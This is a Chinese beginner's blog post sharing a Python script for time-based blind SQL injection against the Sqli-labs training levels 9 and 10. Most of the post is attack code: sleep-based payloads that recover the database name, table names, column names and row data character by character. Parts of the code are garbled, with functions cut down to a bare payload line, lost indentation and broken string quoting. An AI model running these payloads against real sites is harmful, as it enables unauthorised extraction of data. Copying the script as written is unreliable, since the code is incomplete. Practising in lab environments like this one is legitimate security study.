测试环境:Sqli-labs
测试关卡:Less-9、Less-10
sqlmap 跑的话,蛮快的,但我刚学这方面,就想尝试一下手工注入,属实是会累死人,就尝试写了个python脚本
不过我在python方面也是个小白,但,能跑就行,提供一下脚本,分享一下思路,给同为小白的同学看一下
时间盲注只需要这两个模块,一个获取时间,一个请求网址
import time import requests
全局就定义了两个参数,一个是靶场网址(id=1后面的符号,需要自行判断,第九关为单引号,第十关为双引号),一个数据库可能采用的字符
url = "http://fwq.c/sqlilabs/Less-9/?id=1'"
words = "abcdefghijklmnopqrstuvwxyz1234567890_-{}, "
判断database()长度的函数,也就是数据库名的长度,可以减少判断数据库名的时间,可以修改length()内部的参数来判断其他变量的长度,减少跑出名字的时间
def lent():
lenth = 0
for i in range(1, 30):
payload = " and if(length(database())=%d,sleep(1),0) --+" % i
#如果正确,延时一秒
urls = url + payload
# print(urls) //可输出测试是否写错
start_time = time.time()#请求开始的时间
requests.get(urls)
end_time = time.time()#请求结束的时间
t = end_time - start_time#时间差
if t >= 1:
lenth += i
return lenth
判断database()名字的函数,把长度函数的返回值代入,进行循环判断,时间盲注的内容大致差不多
def database_name(lenth):
dbn = ''# db name
for a in range(1, lenth + 1):
for b in words: #前面定义的字符串
payload = " and if(substr(database(),%d,1)='%s',sleep(1),0) --+" % (a, b)
# " ' "转义单引号
urls = url + payload
starttime = time.time()
requests.get(urls)
endtime = time.time()
# print(urls)
t = endtime - starttime
if t >= 1:
dbn += b
return dbn
table name的payload,除了少数变量名改变,其余部分与上面一致,在这里重新定义了长度,由用户输入,可以更加灵活的查询,调试等,当然对表名长度进行判断后再进行时间盲注是最好的
def table_name(dbn, user_len): for a in range(1, user_len + 1):#user_len由用户自己输入 payload = " and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='%s'),%d,1)='%s',sleep(1),0) --+" % ( dbn, a, b)
column name的payload
def column_name(tbn, user_len): payload = " and if(substr((select group_concat(column_name) from information_schema.columns where table_name='%s'),%d,1)='%s',sleep(1),0) --+" % ( tbn, a, b)
数据的payload
def column_data(con, tbn, user_len): payload = " and if(substr((select group_concat(%s) from %s),%d,1)='%s',sleep(1),0) --+" % ( con, tbn, a, b)
主函数
if __name__ == '__main__':
lenth = lent() #database()长度获取
print("it is start")
dbn = database_name(lenth) #database name赋值给dbn
print('database name is:' + dbn) #名字输出
print('do you want to change default length? y/n (default is 40)')
time_chose = input() #是否选择自定义查询长度
if time_chose == 'y' or time_chose == 'Y':
user_len = int(input('len:')) #输入长度
else:
user_len = 40 #默认查询长度为40
print("it is start")
tbn = table_name(dbn, user_len) #table name赋值给tbn
print('tables name is:' + tbn)
print('which table you want to search?')
tbn = input('table:') #table选择
while tbn != 'quit': #当输入quit时退出table选择
print('do you want to change default length? y/n (default is 40)')
time_chose = input('y/n')
if time_chose == 'y' or time_chose == 'Y':
user_len = int(input('len:'))
else:
user_len = 40
print("it is start")
con = column_name(tbn, user_len) #column name赋值给con
print('column_name is :' + con)
print('if you want to quit please insert 'quit'')
tbn = input('table:')
print('which column you want to search?')
con = input('column:')
print('which table you want to search?')
tbn = input('table:')
while tbn != 'quit' or con != 'quit': #如果table或coluimn为quit,退出查询
print('do you want to change default length?(default is 40)')
time_chose = input('y/n:')
if time_chose == 'y' or time_chose == 'Y':
user_len = int(input('len:')) #长度自定义
else:
user_len = 40
print("it is start")
codata = column_data(con, tbn, user_len)
print('column_data is :' + codata)
print('if you want to quit please insert 'quit',and which columnn you want to search')
con = input('column:')
if con == 'quit':
break
else:
print('table of course')
tbn = input('table:')
代码也不是很完善,毕竟还是个小白,查询时间较长,需要耐心等待,直接使用sqlmap还是更加方便,我也只是心血来潮想写个脚本跑一下,脚本也只是能跑
